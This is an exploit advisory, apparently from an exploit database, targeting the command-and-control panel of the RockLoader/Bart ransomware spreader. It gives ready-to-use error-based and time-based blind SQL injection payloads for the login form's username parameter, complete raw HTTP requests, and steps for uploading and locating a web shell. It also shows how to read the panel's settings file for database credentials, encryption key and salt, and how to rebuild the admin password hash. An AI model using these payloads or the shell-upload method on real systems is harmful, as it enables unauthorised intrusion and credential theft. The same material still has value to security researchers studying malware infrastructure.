`# Exploit Title: RockLoader aka Bart Malware [SQLi] and shell file upload # Date: 27-06-2016 # Software Link Leak: https://github.com/colocation/RockLoader-source # Exploit Author: Danail Velev # Contact: ICQ: 209030 / d.velev@colocation.bg # Website: http://colocation.bg/ # Category: webapps / malware / private software / infection spreader / C&C # Inspiration: http://www.xylibox.com/ 1. Description Since last days ... new Bart aka RockLoader malware/rasomware spreader is active. My family was a victim of this type of extortion past year. 2. Short info: SQL Injections NO user registration required. The Command and Control Server processing the spread requests,user tasks and responsible for the process, is suffering from mutiple remote sql injection. Common C&C server path is "/cp/login/" in most common setups. Since the specific of the spreader and it's functionality, methods of encryption and working process, There is possibility for RCE,MSF/CMD injection and local root post explotation. In common cases the setup comes with this specific configs. - user has full priviligies to host sql server. - you can interact with local file read in most conditions. - user is database administrator in most conditions. - database name and structure are identical since it comes as phpmyadmin dump. - file write and read is a must. - user screen capture plugin on advanced setups. - default database name is 'appdater' 3. Proof of Concept: Affected parameters are "username" and "password" via specifict POST request. The 3th parameter is the php session. ----=(SQL Injection 1)=---- Type: error-based Method: POST Request Type: XMLHttpRequest Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload example for POST parameter username: password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118 UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)-- KSxg1=6 AND 000580=000580 -- Example raw request for host: 127.0.0.1 -----------------EXAMPLE-------------------- POST /cp/login/ HTTP/1.1 Content-Length: 87 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: 127.0.0.1/cp/login/ Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190 Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* password=S0M3PaSSw0rd&username=d0na1DTrump -----------------END-------------------- ================================================================================================================================================================= POC: ----=(SQL Injection 2)=---- Type: AND/OR time-based blind Method: POST Request Type: XMLHttpRequest Title: MySQL >= 5.0.12 AND time-based blind Payload example for POST parameter username: password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND 000580=000580 -- Example raw request for host: 127.0.0.1 -----------------EXAMPLE-------------------- POST /cp/login/ HTTP/1.1 Content-Length: 87 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: 127.0.0.1/cp/login/ Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190 Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* password=S0M3PaSSw0rd&username=d0na1DTrump -----------------END-------------------- ================================================================================================================================================================= POC: ----=(Shell Upload POC)=---- Requirements: - Valid user for control panel. - Access to database for reading. Step1: Upload your shell as new file via Control Panel. Name it: OWNED Note: filename is masked in control panel Step2: See 'file' table at 'appdater' database. QUERY: SELECT * FROM `file`; Look for name=OWNED and coresponding file_path name (EXAMPLE: C932kc.php) Step3: Location of your Shell http://127.0.0.1/files/c932kc.php -----------------END-------------------- ================================================================================================================================================================= POC: ----=(Database user and password disclose)=---- Example request to get the directory location: =============================================== POST /cp/login/ HTTP/1.1 Content-Length: 87 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: 127.0.0.1/cp/login/ Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190 Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* password=S0M3PaSSw0rd&username=d0na1DTrump =============================================== Response if error reporting is enabled:
Notice: A session had already been started - ignoring session_start() in /var/www/html/cp/login/auth.php on line 23
=============================================== Read the settings.php file of the control panel to obtain user and password for database. location: /var/www/html/cp/settings.php ----Snip----- ---EndSnip--- TADAAAAAAAAAAAAAAAAAAAAAAAAAa we got the password for the sql and even more: XOR_KEY for file encyption, EXE files location, PATH to the Control Panel anddd.... The most important --> THE SALT ! ================================================================================================================================================================= POC: ---=(Admin panel password generator)=--- Read the core/functions.php file (/var/www/appdater/html/core/functions.php) Look for this ---Snip----- function create_hash( $string ) { return substr( sha1( SALT . $string ), 3, 17 ); } ----EndSnip--- TADAAAA so we got and the algo used to create correct user and password. ================================================================================================================================================================= 3. Solution: DO NOT WRITE BUGGY APPZ:) `

Query Builder